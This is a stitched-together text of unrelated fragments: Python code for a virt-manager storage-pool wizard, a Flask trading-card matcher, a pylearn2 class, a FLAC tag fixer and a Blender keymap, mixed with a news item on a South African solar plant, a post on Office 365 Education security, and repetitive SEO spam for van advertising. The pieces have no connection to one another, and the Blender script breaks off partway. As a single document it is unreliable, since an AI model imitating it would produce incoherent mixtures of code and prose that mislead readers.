self.widget("pool-name").grab_focus()
self.widget("pool-type").set_active(0)
self.widget("pool-target-path").child.set_text("")
self.widget("pool-source-path").child.set_text("")
self.widget("pool-hostname").set_text("")
self.widget("pool-iqn-chk").set_active(False)
self.widget("pool-iqn-chk").toggled()
self.widget("pool-iqn").set_text("")
self.widget("pool-format").set_active(-1)
self.widget("pool-build").set_sensitive(True)
self.widget("pool-build").set_active(False)
def hostname_changed(self, ignore):
# If a hostname was entered, try to lookup valid pool sources.
self.populate_pool_sources()
def iqn_toggled(self, src):
self.widget("pool-iqn").set_sensitive(src.get_active())
def populate_pool_type(self):
model = self.widget("pool-type").get_model()
model.clear()
types = Storage.StoragePool.get_pool_types()
types.sort()
for typ in types:
model.append([typ, "%s: %s" %
(typ, Storage.StoragePool.get_pool_type_desc(typ))])
def populate_pool_format(self, formats):
model = self.widget("pool-format").get_model()
model.clear()
for f in formats:
model.append([f, f])
def populate_pool_sources(self):
source_list = self.widget("pool-source-path")
source_model = source_list.get_model()
source_model.clear()
target_list = self.widget("pool-target-path")
target_model = target_list.get_model()
target_model.clear()
use_list = source_list
use_model = source_model
entry_list = []
if self._pool.type == Storage.StoragePool.TYPE_SCSI:
entry_list = self.list_scsi_adapters()
use_list = source_list
use_model = source_model
elif self._pool.type == Storage.StoragePool.TYPE_LOGICAL:
pool_list = self.list_pool_sources()
entry_list = map(lambda p: [p.target_path, p.target_path, p],
pool_list)
use_list = target_list
use_model = target_model
elif self._pool.type == Storage.StoragePool.TYPE_DISK:
entry_list = self.list_disk_devs()
use_list = source_list
use_model = source_model
elif self._pool.type == Storage.StoragePool.TYPE_NETFS:
host = self.get_config_host()
if host:
pool_list = self.list_pool_sources(host=host)
entry_list = map(lambda p: [p.source_path, p.source_path, p],
pool_list)
use_list = source_list
use_model = source_model
for e in entry_list:
use_model.append(e)
if entry_list:
use_list.set_active(0)
def list_scsi_adapters(self):
scsi_hosts = self.conn.get_nodedevs("scsi_host")
host_list = map(lambda dev: dev.host, scsi_hosts)
clean_list = []
for h in host_list:
tmppool = copy.copy(self._pool)
name = "host%s" % h
tmppool.source_path = name
entry = [name, name, tmppool]
if name not in map(lambda l: l[0], clean_list):
clean_list.append(entry)
return clean_list
def list_disk_devs(self):
devs = self.conn.get_nodedevs("storage")
devlist = []
for dev in devs:
if dev.drive_type != "disk" or not dev.block:
continue
devlist.append(dev.block)
devlist.sort()
clean_list = []
for dev in devlist:
tmppool = copy.copy(self._pool)
tmppool.source_path = dev
entry = [dev, dev, tmppool]
if dev not in map(lambda l: l[0], clean_list):
clean_list.append(entry)
return clean_list
def list_pool_sources(self, host=None):
name = self.get_config_name()
pool_type = self._pool.type
plist = []
try:
plist = Storage.StoragePool.pool_list_from_sources(self.conn.vmm,
name, pool_type,
host=host)
except Exception:
logging.exception("Pool enumeration failed")
return plist
def show_options_by_pool(self):
def show_row(base, do_show):
self.widget(base + "-label").set_property("visible", do_show)
self.widget(base + "-box").set_property("visible", do_show)
src = hasattr(self._pool, "source_path")
src_b = src and not self.conn.is_remote()
tgt = hasattr(self._pool, "target_path")
tgt_b = tgt and not self.conn.is_remote()
host = hasattr(self._pool, "host")
fmt = hasattr(self._pool, "formats")
iqn = hasattr(self._pool, "iqn")
builddef, buildsens = self.get_build_default()
# Source path broswing is meaningless for net pools
if self._pool.type in [Storage.StoragePool.TYPE_NETFS,
Storage.StoragePool.TYPE_ISCSI,
Storage.StoragePool.TYPE_SCSI]:
src_b = False
show_row("pool-target", tgt)
show_row("pool-source", src)
show_row("pool-hostname", host)
show_row("pool-format", fmt)
show_row("pool-build", buildsens)
show_row("pool-iqn", iqn)
self.widget("pool-target-path").child.set_text(self._pool.target_path)
self.widget("pool-target-button").set_sensitive(tgt_b)
self.widget("pool-source-button").set_sensitive(src_b)
self.widget("pool-build").set_active(builddef)
self.widget("pool-format").set_active(-1)
if fmt:
self.populate_pool_format(getattr(self._pool, "formats"))
self.widget("pool-format").set_active(0)
self.populate_pool_sources()
def get_config_type(self):
typ = self.widget("pool-type")
if typ.get_active_iter() != None:
return typ.get_model().get_value(typ.get_active_iter(), 0)
return None
def get_config_name(self):
return self.widget("pool-name").get_text()
def get_config_target_path(self):
src = self.widget("pool-target-path")
if not src.get_property("sensitive"):
return None
# If we provide the user with a drop down
model = src.get_model()
selection = src.get_active()
if selection != -1:
return model[selection][1]
return src.child.get_text()
def get_config_source_path(self):
src = self.widget("pool-source-path")
if not src.get_property("sensitive"):
return None
# If we provide the user with a drop down
model = src.get_model()
selection = src.get_active()
if selection != -1:
return model[selection][1]
return src.child.get_text().strip()
def get_config_host(self):
host = self.widget("pool-hostname")
if host.get_property("sensitive"):
return host.get_text().strip()
return None
def get_config_format(self):
format_combo = self.widget("pool-format")
model = format_combo.get_model()
if format_combo.get_active_iter() != None:
model = format_combo.get_model()
return model.get_value(format_combo.get_active_iter(), 0)
return None
def get_config_iqn(self):
iqn = self.widget("pool-iqn")
if iqn.get_property("sensitive") and iqn.get_property("visible"):
return iqn.get_text().strip()
return None
def get_build_default(self):
""" Return (default value, whether build option can be changed)"""
if not self._pool:
return (False, False)
if self._pool.type in [Storage.StoragePool.TYPE_DIR,
Storage.StoragePool.TYPE_FS,
Storage.StoragePool.TYPE_NETFS]:
# Building for these simply entails creating a directory
return (True, False)
elif self._pool.type in [Storage.StoragePool.TYPE_LOGICAL,
Storage.StoragePool.TYPE_DISK]:
# This is a dangerous operation, anything (False, True)
# should be assumed to be one.
return (False, True)
else:
return (False, False)
def browse_source_path(self, ignore1=None):
source = self._browse_file(_("Choose source path"),
startfolder="/dev", foldermode=False)
if source:
self.widget("pool-source-path").child.set_text(source)
def browse_target_path(self, ignore1=None):
target = self._browse_file(_("Choose target directory"),
startfolder="/var/lib/libvirt",
foldermode=True)
if target:
self.widget("pool-target-path").child.set_text(target)
def forward(self, ignore=None):
notebook = self.widget("pool-pages")
try:
if(self.validate(notebook.get_current_page()) != True):
return
if notebook.get_current_page() == PAGE_FORMAT:
self.finish()
else:
self.widget("pool-forward").grab_focus()
notebook.next_page()
except Exception, e:
self.err.show_err(_("Uncaught error validating input: %s") % str(e))
return
def back(self, ignore=None):
self.widget("pool-finish").hide()
self.widget("pool-forward").show()
self.widget("pool-pages").prev_page()
def finish(self):
self.topwin.set_sensitive(False)
self.topwin.window.set_cursor(gtk.gdk.Cursor(gtk.gdk.WATCH))
build = self.widget("pool-build").get_active()
progWin = vmmAsyncJob(self._async_pool_create, [build],
_("Creating storage pool..."),
_("Creating the storage pool may take a "
"while..."),
self.topwin)
error, details = progWin.run()
self.topwin.set_sensitive(True)
self.topwin.window.set_cursor(gtk.gdk.Cursor(gtk.gdk.TOP_LEFT_ARROW))
if error:
error = _("Error creating pool: %s") % error
self.err.show_err(error,
details=details)
else:
self.close()
def _async_pool_create(self, asyncjob, build):
newconn = None
# Open a seperate connection to install on since this is async
newconn = util.dup_lib_conn(self._pool.conn)
meter = asyncjob.get_meter()
self._pool.conn = newconn
logging.debug("Starting backround pool creation.")
poolobj = self._pool.install(create=True, meter=meter, build=build)
poolobj.setAutostart(True)
logging.debug("Pool creation succeeded")
def page_changed(self, notebook_ignore, page_ignore, page_number):
if page_number == PAGE_NAME:
self.widget("pool-back").set_sensitive(False)
self.widget("pool-finish").hide()
self.widget("pool-forward").show()
self.widget("pool-forward").grab_focus()
elif page_number == PAGE_FORMAT:
self.widget("pool-back").set_sensitive(True)
self.widget("pool-finish").show()
self.widget("pool-finish").grab_focus()
self.widget("pool-forward").hide()
self.show_options_by_pool()
def get_pool_to_validate(self):
"""
Return a pool instance to use for parameter assignment validation.
For most pools this will be the one we built after step 1, but for
pools we find via FindPoolSources, this will be different
"""
source_list = self.widget("pool-source-path")
target_list = self.widget("pool-target-path")
pool = copy.copy(self._pool)
if source_list.get_active() != -1:
pool = source_list.get_model()[source_list.get_active()][2]
elif target_list.get_active() != -1:
pool = target_list.get_model()[target_list.get_active()][2]
return pool
def validate(self, page):
if page == PAGE_NAME:
typ = self.get_config_type()
name = self.get_config_name()
conn = self.conn.vmm
try:
self._pool_class = Storage.StoragePool.get_pool_class(typ)
self._pool = self._pool_class(name=name, conn=conn)
except ValueError, e:
return self.err.val_err(_("Pool Parameter Error"), e)
return True
elif page == PAGE_FORMAT:
target = self.get_config_target_path()
host = self.get_config_host()
source = self.get_config_source_path()
fmt = self.get_config_format()
iqn = self.get_config_iqn()
tmppool = self.get_pool_to_validate()
try:
tmppool.target_path = target
if host:
tmppool.host = host
if source:
tmppool.source_path = source
if fmt:
tmppool.format = fmt
if iqn:
tmppool.iqn = iqn
tmppool.get_xml_config()
except ValueError, e:
return self.err.val_err(_("Pool Parameter Error"), e)
buildval = self.widget("pool-build").get_active()
buildsen = (self.widget("pool-build").get_property("sensitive") and
self.widget("pool-build-box").get_property("visible"))
if buildsen and buildval:
ret = self.err.yes_no(_("Building a pool of this type will "
"format the source device. Are you "
"sure you want to 'build' this pool?"))
if not ret:
return ret
self._pool = tmppool
return True
def update_doc(self, ignore1, ignore2, param, infobox):
doc = self._build_doc_str(param)
self.widget(infobox).set_markup(doc)
def update_build_doc(self, ignore1, ignore2):
doc = ""
docstr = ""
if self._pool.type == Storage.StoragePool.TYPE_DISK:
docstr = _("Format the source device.")
elif self._pool.type == Storage.StoragePool.TYPE_LOGICAL:
docstr = _("Create a logical volume group from the source device.")
if docstr:
doc = self._build_doc_str("build", docstr)
self.widget("pool-info2").set_markup(doc)
def update_doc_changed(self, ignore1, param, infobox):
# Wrapper for update_doc and 'changed' signal
self.update_doc(None, None, param, infobox)
def _build_doc_str(self, param, docstr=None):
doc = ""
doctmpl = "<i><u>%s</u>: %s</i>"
prettyname = param.replace("_", " ").capitalize()
if docstr:
doc = doctmpl % (prettyname, docstr)
elif hasattr(self._pool_class, param):
doc = doctmpl % (prettyname,
getattr(self._pool_class, param).__doc__)
return doc
def _browse_file(self, dialog_name, startfolder=None, foldermode=False):
mode = gtk.FILE_CHOOSER_ACTION_OPEN
if foldermode:
mode = gtk.FILE_CHOOSER_ACTION_SELECT_FOLDER
return util.browse_local(self.topwin, dialog_name, self.conn,
dialog_type=mode,
start_folder=startfolder)
vmmGObjectUI.type_register(vmmCreatePool)
|
South Africa is to unveil plans this week for what it claims will be the world's biggest solar power plant – a radical step in a coal-dependent country where one in six people still lacks electricity.
The project, expected to cost up to R200bn (£18.42bn), would aim by the end of its first decade to achieve an annual output of five gigawatts (GW) of electricity – currently one-tenth of South Africa's energy needs.
Giant mirrors and solar panels would be spread across the Northern Cape province, which the government says is among the sunniest 3% of regions in the world with minimal cloud or rain.
General aversions to monopolies (and certain subsidies) aside, I've been pretty positive about CSP (concentrated solar power) in that part of the country for a while. One concern I do have about these big solar projects though, is that they tend to be in - well - hot and dry places. This becomes problematic given that you need pretty substantial amounts of water for cooling (with thermal plants) and even cleaning (for photovoltaics). I guess it was inevitable that they've got their eyes set on the Orange River for this one... I'm interested to see what the EIA throws up.
|
from app import db
from ..emoticharms.models import UserPack, Pack
from flask import Blueprint, render_template, abort
from forms import UserPacksForm, PackQuantityField
from ..util import valid_ti5_ticket
from flask.ext.login import login_required, current_user
from ..users.models import User
emoticharms = Blueprint("emoticharms", __name__, url_prefix="/emoticharms")
@emoticharms.route('/collection/', methods=['GET', 'POST'])
@login_required
@valid_ti5_ticket
def collection():
form = UserPacksForm()
if form.validate_on_submit():
print 'submitted'
for field in form:
if not isinstance(field, PackQuantityField):
continue
user_pack = UserPack.query.filter_by(pack_id=field.pack.id, user_id=current_user.account_id).first()
if user_pack is None:
user_pack = UserPack(field.pack.id, current_user.account_id, field.data)
db.session.add(user_pack)
else:
user_pack.quantity = field.data
db.session.commit()
form_data = {
user_pack.pack.normalized_name: user_pack.quantity
for user_pack in UserPack.query.filter_by(user=current_user).all()
}
print form_data
form = UserPacksForm(data=form_data)
return render_template('emoticharms/collection.html', form=form)
@emoticharms.route('/matches/')
@login_required
@valid_ti5_ticket
def matches():
"""
Match with other users by the count of packs the other party has that we want,
and that the other party wants and we have. Ordered by the most amount of combined packs matched.
"""
# Get ids of own packs where we own 0 (we need)
wanted_packs = UserPack.query.filter(UserPack.user_id == current_user.account_id, UserPack.quantity == 0).all()
spare_packs = UserPack.query.filter(UserPack.user_id == current_user.account_id, UserPack.quantity > 1).all()
wanted_pack_ids = [unicode(user_pack.pack_id) for user_pack in wanted_packs]
spare_pack_ids = [unicode(user_pack.pack_id) for user_pack in spare_packs]
# Get ids of owned packs that are greater than 1 (our dupes)
matches_query = db.engine.execute("""
SELECT
account_id,
SUM(spare_count) as other_user_has_spare_count,
SUM(want_count) as other_user_wants_count,
(spare_count + want_count) as total_count
FROM (
SELECT u.account_id, COUNT(*) as spare_count, 0 as want_count
FROM users u
INNER JOIN user_pack up
ON up.user_id = u.account_id AND up.pack_id IN ({wanted_pack_ids}) AND up.quantity > 1
GROUP BY u.account_id
UNION
SELECT u.account_id, 0 as spare_count, COUNT(*) as want_count
FROM users u
INNER JOIN user_pack up
ON up.user_id = u.account_id AND up.pack_id IN ({spare_pack_ids}) AND up.quantity = 0
GROUP BY u.account_id
) counts_table
GROUP BY counts_table.account_id
ORDER BY total_count desc
""".format(
wanted_pack_ids=','.join(wanted_pack_ids),
spare_pack_ids=','.join(spare_pack_ids)
)
)
# Attach user objects (probably a lot better way to do this)
matches = []
for match in matches_query:
matches.append({
'user': User.query.filter(User.account_id == match[0]).first(),
'other_user_has_spare_count': match[1],
'other_user_wants_count': match[2]
})
return render_template('emoticharms/matches.html',
wanted_packs=wanted_packs,
spare_packs=spare_packs,
matches=matches)
@emoticharms.route('/trade/<int:trade_user_id>/')
@login_required
@valid_ti5_ticket
def trade(trade_user_id):
if trade_user_id == current_user.account_id:
abort(404)
trade_user = User.query.get_or_404(trade_user_id)
w1 = UserPack.query.filter(UserPack.user_id == current_user.account_id, UserPack.quantity == 0)
w2 = UserPack.query.filter(UserPack.user_id == trade_user.account_id, UserPack.quantity > 1)
#h1
#h2
user1 = w1.intersect(w2).all()
print user1
#user2 =
trade = {
"target_user": trade_user,
"giving": [],
"receiving": [],
}
return render_template('emoticharms/trade.html', trade=trade)
|
You may or may not have noticed that on the 1st September Microsoft announced new security features for Office 365 Education users however these weren’t new as they have been in the platform for a few years.
Education licenses have been aligned more closely with the enterprise licenses, with E1 Student/Faculty matching E1 Enterprise, and as new features are added to E1 they are assigned to both tenant types. The new security features announced in this post are based on some of the features that are part of E3 Enterprise.
With any of my customers I haven’t seen any use of E3 as almost all have been happy to use the free licenses and pleased that they can get Office 365 Pro Plus as part of their Microsoft licensing but Microsoft have mixed up the features and given more to education customers for free which were in E3.
These are based more around security and discovery of files better known as E-Discovery, Rights Management Services and Data Loss Prevention have also been added but what are these.
I always describe E-Discovery as a search service if you need to find data across your whole tenant for a disciplinary hearing and you need to find everything that mentions certain words. An example I use is if a gang has started in a school and they have a name and you need to find all the emails, files and data which uses the gang name. Having searched the name, the E-Discovery tool will give you a ZIP file to download all that content.
RMS is a great way of keeping data secure by only allowing users to see the data they should. Now you might be thinking ‘well SharePoint permissions does that for me’ but this takes it to the next level. With RMS/DLP you can prevent sensitive data from being printed, secure documents with encryption if it starts to hold student data and also prevent files from being print screened and then copied into other files. Rights ensures only the right people can view the content and alongside DLP prevents them from doing certain things with it.
|
"""Module containing the Train class and support functionality."""
__authors__ = "Ian Goodfellow"
__copyright__ = "Copyright 2010-2015, Universite de Montreal"
__credits__ = ["Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
__email__ = "pylearn-dev@googlegroups"
from collections import namedtuple
# Lightweight container for initial YAML evaluation.
#
# This is intended as a robust, forward-compatible intermediate representation
# for either internal consumption or external consumption by another tool e.g.
# hyperopt.
#
# We've included a slot for positionals just in case, though they are
# unsupported by the instantiation mechanism as yet.
BaseProxy = namedtuple('BaseProxy', ['callable', 'positionals',
'keywords', 'yaml_src'])
class Proxy(BaseProxy):
"""
An intermediate representation between initial YAML parse and object
instantiation.
Parameters
----------
callable : callable
The function/class to call to instantiate this node.
positionals : iterable
Placeholder for future support for positional arguments (`*args`).
keywords : dict-like
A mapping from keywords to arguments (`**kwargs`), which may be
`Proxy`s or `Proxy`s nested inside `dict` or `list` instances.
Keys must be strings that are valid Python variable names.
yaml_src : str
The YAML source that created this node, if available.
Notes
-----
This is intended as a robust, forward-compatible intermediate
representation for either internal consumption or external consumption
by another tool e.g. hyperopt.
This particular class mainly exists to override `BaseProxy`'s `__hash__`
(to avoid hashing unhashable namedtuple elements).
"""
__slots__ = []
def __hash__(self):
"""
Return a hash based on the object ID (to avoid hashing unhashable
namedtuple elements).
"""
return hash(id(self))
|
Mobile billboard advertising in Cilycwm SA20 0 is a great way to promote products and services because they can target a wide audience. When searching for advertising production providers it is advisable to look at prices as well as value of services. Our agency can offer media design and media purchasing services by using a number of types of adverts to choose from. Our experts will look through your budget and brand and look for a strategy to promote your products to get you the best beneficial ROI. It’s necessary to look for a company with a good background that can supply the appropriate solutions for your business. As a skilled advertising on vans company, we'll assist you to generate a completely unique and efficient marketing plan.
Our company is a completely independent media agency closest to you in Cilycwm SA20 0 helping arrange and prepare AdVans adverts for organisations and services in numerous markets. A number of the ads that we generate and buy include social media adverts, papers, posters, television advertisements, radio ads, online marketing and much more. As local industry leaders, we are able to develop new promotional suggestions which are unique to the client's brand, create advertisements and schedule campaigns. As a current market leader within the offline and internet marketing sector we think that van marketing campaigns do not run but they evolve. We perform research on a daily basis to make certain that you receive the ideal solutions from our staff. For the best effects and ROI, we try to get an immediate reaction that concentrates on the main audience straight away. Make sure you consult with one of our advertising on vans experts by filling out the enquiry form. We will provide further information and advice on the right approaches and process to carry out promotions for your own company. Because we are an impartial offline advertising professional we can deliver fantastic return on investment from the adverts.
Get a quote for mobile billboard advertising in Cilycwm SA20 0 today and we'll get your marketing campaign underway. Our professionals will be happy to help with any questions about van advertising which you might have. To get in contact with us, just enquire using our enquiry form and we will get back to you as quickly as we can.
|
#!/usr/bin/env python
# Copyright 2009 by Jeff Ebert
# License: GNU GPL v2
import sys
import mutagen.flac
import os.path as path
# Tip from:
# http://stackoverflow.com/questions/492483/setting-the-correct-encoding-when-piping-stdout-in-python
import codecs
sys.stdout = codecs.getwriter('utf8')(sys.stdout)
def fix_mb_tags(flac_file):
for tag in flac_file:
if tag.startswith('musicbrainz_'):
# The value of each tag is a list, so I must iterate even though
# there is only 1 for these cases.
values = flac_file[tag]
for i in range(len(values)):
# Extract UUID value from URL.
base = path.basename(values[i])
base = path.splitext(base)[0]
values[i] = base
flac_file[tag] = values
def main(argv):
if len(argv) == 1:
print "Usage: {0} <flac file>+\n".format(path.basename(argv[0]))
sys.exit(0)
for fn in argv[1:]:
flac_file = mutagen.flac.Open(fn)
fix_mb_tags(flac_file)
print flac_file.pprint()
flac_file.save()
if __name__ == '__main__':
main(sys.argv)
|
Serious style inspo! Love it!!
|
import bpy
import os
def kmi_props_setattr(kmi_props, attr, value):
    """Assign *value* to property *attr* on a keymap-item property group.

    Failures are reported with a printed warning instead of raising, so
    one bad binding does not abort loading the whole key configuration.
    """
    try:
        setattr(kmi_props, attr, value)
        return
    except AttributeError:
        message = ("Warning: property '%s' not found in keymap item '%s'" %
                   (attr, kmi_props.__class__.__name__))
    except Exception as e:
        message = "Warning: %r" % e
    print(message)
# Register a fresh key configuration named after this script file.
wm = bpy.context.window_manager
kc = wm.keyconfigs.new(os.path.splitext(os.path.basename(__file__))[0])
# Map Object Mode
# Keymap for Object Mode: selection, parenting, visibility, deletion,
# grouping, keyframing and subdivision-level shortcuts.
km = kc.keymaps.new('Object Mode', space_type='EMPTY', region_type='WINDOW', modal=False)
kmi = km.keymap_items.new('wm.context_cycle_enum', 'O', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'data_path', 'tool_settings.proportional_edit_falloff')
kmi = km.keymap_items.new('wm.context_toggle', 'O', 'PRESS')
kmi_props_setattr(kmi.properties, 'data_path', 'tool_settings.use_proportional_edit_objects')
kmi = km.keymap_items.new('view3d.game_start', 'P', 'PRESS')
kmi = km.keymap_items.new('object.select_all', 'A', 'CLICK', ctrl=True)
kmi_props_setattr(kmi.properties, 'action', 'SELECT')
kmi = km.keymap_items.new('object.select_all', 'I', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'action', 'INVERT')
kmi = km.keymap_items.new('object.select_linked', 'L', 'PRESS', shift=True)
kmi = km.keymap_items.new('object.select_grouped', 'G', 'PRESS', shift=True)
kmi = km.keymap_items.new('object.select_mirror', 'M', 'PRESS', shift=True, ctrl=True)
# Hierarchy navigation: [ / ] walk to parent / child, Shift extends.
kmi = km.keymap_items.new('object.select_hierarchy', 'LEFT_BRACKET', 'PRESS')
kmi_props_setattr(kmi.properties, 'direction', 'PARENT')
kmi_props_setattr(kmi.properties, 'extend', False)
kmi = km.keymap_items.new('object.select_hierarchy', 'LEFT_BRACKET', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'direction', 'PARENT')
kmi_props_setattr(kmi.properties, 'extend', True)
kmi = km.keymap_items.new('object.select_hierarchy', 'RIGHT_BRACKET', 'PRESS')
kmi_props_setattr(kmi.properties, 'direction', 'CHILD')
kmi_props_setattr(kmi.properties, 'extend', False)
kmi = km.keymap_items.new('object.select_hierarchy', 'RIGHT_BRACKET', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'direction', 'CHILD')
kmi_props_setattr(kmi.properties, 'extend', True)
kmi = km.keymap_items.new('object.parent_set', 'P', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('object.parent_no_inverse_set', 'P', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('object.parent_clear', 'P', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.track_set', 'T', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('object.track_clear', 'T', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.constraint_add_with_targets', 'C', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('object.constraints_clear', 'C', 'PRESS', ctrl=True, alt=True)
kmi = km.keymap_items.new('object.location_clear', 'G', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.rotation_clear', 'R', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.scale_clear', 'S', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.origin_clear', 'O', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.hide_view_clear', 'H', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.hide_view_set', 'H', 'PRESS')
kmi_props_setattr(kmi.properties, 'unselected', False)
kmi = km.keymap_items.new('object.hide_view_set', 'H', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'unselected', True)
kmi = km.keymap_items.new('object.hide_render_clear', 'H', 'PRESS', ctrl=True, alt=True)
kmi = km.keymap_items.new('object.hide_render_set', 'H', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('object.move_to_layer', 'M', 'PRESS')
kmi = km.keymap_items.new('object.delete', 'X', 'PRESS')
kmi_props_setattr(kmi.properties, 'use_global', False)
kmi = km.keymap_items.new('object.delete', 'X', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_global', True)
kmi = km.keymap_items.new('object.delete', 'DEL', 'PRESS')
kmi_props_setattr(kmi.properties, 'use_global', False)
kmi = km.keymap_items.new('object.delete', 'DEL', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_global', True)
kmi = km.keymap_items.new('wm.call_menu', 'F', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'INFO_MT_add')
kmi = km.keymap_items.new('object.duplicates_make_real', 'A', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('wm.call_menu', 'A', 'PRESS', alt=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_object_apply')
kmi = km.keymap_items.new('wm.call_menu', 'U', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_make_single_user')
kmi = km.keymap_items.new('wm.call_menu', 'L', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_make_links')
kmi = km.keymap_items.new('object.duplicate_move', 'D', 'PRESS', shift=True)
kmi = km.keymap_items.new('object.duplicate_move_linked', 'D', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.join', 'J', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('object.convert', 'C', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.proxy_make', 'P', 'PRESS', ctrl=True, alt=True)
kmi = km.keymap_items.new('object.make_local', 'L', 'PRESS')
kmi = km.keymap_items.new('anim.keyframe_insert_menu', 'I', 'PRESS')
kmi = km.keymap_items.new('anim.keyframe_delete_v3d', 'I', 'PRESS', alt=True)
kmi = km.keymap_items.new('anim.keying_set_active_set', 'I', 'PRESS', shift=True, ctrl=True, alt=True)
kmi = km.keymap_items.new('group.create', 'G', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('group.objects_remove', 'G', 'PRESS', ctrl=True, alt=True)
kmi = km.keymap_items.new('group.objects_remove_all', 'G', 'PRESS', shift=True, ctrl=True, alt=True)
kmi = km.keymap_items.new('group.objects_add_active', 'G', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('group.objects_remove_active', 'G', 'PRESS', shift=True, alt=True)
kmi = km.keymap_items.new('wm.call_menu', 'W', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_object_specials')
kmi.active = False  # binding registered but deliberately disabled
kmi = km.keymap_items.new('object.data_transfer', 'T', 'PRESS', shift=True, ctrl=True)
# Ctrl+0..5 set the subdivision level directly.
kmi = km.keymap_items.new('object.subdivision_set', 'ZERO', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 0)
kmi = km.keymap_items.new('object.subdivision_set', 'ONE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 1)
kmi = km.keymap_items.new('object.subdivision_set', 'TWO', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 2)
kmi = km.keymap_items.new('object.subdivision_set', 'THREE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 3)
kmi = km.keymap_items.new('object.subdivision_set', 'FOUR', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 4)
kmi = km.keymap_items.new('object.subdivision_set', 'FIVE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 5)
kmi = km.keymap_items.new('view3d.manipulator', 'SELECTMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'release_confirm', True)
# Map Mesh
# Keymap for mesh Edit Mode: loop/ring selection, modelling operators,
# deletion menus, knife tool and select-mode switching.
km = kc.keymaps.new('Mesh', space_type='EMPTY', region_type='WINDOW', modal=False)
kmi = km.keymap_items.new('mesh.loopcut_slide', 'R', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.inset', 'I', 'PRESS')
kmi = km.keymap_items.new('mesh.poke', 'P', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.bevel', 'B', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'vertex_only', False)
kmi = km.keymap_items.new('mesh.bevel', 'B', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'vertex_only', True)
kmi = km.keymap_items.new('mesh.loop_select', 'SELECTMOUSE', 'PRESS', alt=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'toggle', False)
kmi = km.keymap_items.new('mesh.loop_select', 'SELECTMOUSE', 'PRESS', shift=True, alt=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'toggle', True)
kmi = km.keymap_items.new('mesh.edgering_select', 'SELECTMOUSE', 'PRESS', ctrl=True, alt=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'toggle', False)
kmi = km.keymap_items.new('mesh.edgering_select', 'SELECTMOUSE', 'PRESS', shift=True, ctrl=True, alt=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'toggle', True)
kmi = km.keymap_items.new('mesh.shortest_path_pick', 'SELECTMOUSE', 'PRESS', ctrl=True)
kmi.active = False  # binding registered but deliberately disabled
kmi = km.keymap_items.new('mesh.select_all', 'A', 'CLICK', ctrl=True)
kmi_props_setattr(kmi.properties, 'action', 'SELECT')
kmi = km.keymap_items.new('mesh.select_all', 'I', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'action', 'INVERT')
kmi = km.keymap_items.new('mesh.select_more', 'NUMPAD_PLUS', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.select_less', 'NUMPAD_MINUS', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.select_non_manifold', 'M', 'PRESS', shift=True, ctrl=True, alt=True)
kmi = km.keymap_items.new('mesh.select_linked', 'L', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.select_linked_pick', 'SELECTMOUSE', 'DOUBLE_CLICK')
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi = km.keymap_items.new('mesh.select_linked_pick', 'SELECTMOUSE', 'HOLD', ctrl=True)
kmi_props_setattr(kmi.properties, 'deselect', True)
kmi = km.keymap_items.new('mesh.faces_select_linked_flat', 'F', 'PRESS', shift=True, ctrl=True, alt=True)
kmi = km.keymap_items.new('wm.call_menu', 'G', 'PRESS', shift=True)
